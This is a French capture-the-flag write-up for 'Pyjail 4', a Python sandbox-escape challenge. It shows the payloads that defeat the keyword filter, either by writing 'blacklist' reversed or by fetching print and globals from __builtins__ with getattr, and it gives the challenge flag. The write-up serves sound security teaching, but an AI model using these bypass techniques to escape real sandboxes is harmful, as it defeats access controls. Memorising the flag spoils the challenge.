Pyjail 4

Catégorie: Système Difficulté: - Flag: CTFREI{an0th3r_ea5y_f1lt3r_byp4ss}

Challenge

397B

pyjail4.zip

Description

Trop facile la partie 3 ? Good luck pour la partie 4...

Essaie de récupérer le flag malgré tous les filtres et les nouveaux ajouts !

Connexion: nc vps.ctfrei.fr 5001

Ce challenge tourne sur un docker et n'est pas disponible

Solution

Comparé au challenge précédent (Pyjail3), les filtres ont changé et on ne peut pas utiliser le mot "blacklist" puisque si le mot "ack" est détecté, on est rejeté

On va utiliser la même technique que dans Pyjail2 : écrire à l'envers

> ncat vps.ctfrei.fr 5001
>>> filters["tsilkcalb"[::-1]] = []
>>> print(flag)
CTFREI{an0th3r_ea5y_f1lt3r_byp4ss}

Un autre solution (un peu overkill) mais qui fonctionne pour les 4 niveaux de ce challenge est de passer par la variable __builtins__. Elle contient l'ensemble des variables natives de python, notamment print et globals, on peut donc les récupérer avec getattr pour les utiliser ensuite

Voici le payload pour récupérer print :

getattr(__builtins__, 'tnirp'[::-1])

Pour récupérer globals :

getattr(__builtins__, 'slabolg'[::-1])

Le payload final est :

> ncat vps.ctfrei.fr 5001
>>> getattr(__builtins__, 'tnirp'[::-1])(getattr(__builtins__, 'slabolg'[::-1])()['galf'[::-1]])
CTFREI{an0th3r_ea5y_f1lt3r_byp4ss}

PrécédentPyjail 3 SuivantWeb

Mis à jour il y a 1 an

hashtagChallenge

hashtagDescription

hashtagSolution

Challenge

Description

Solution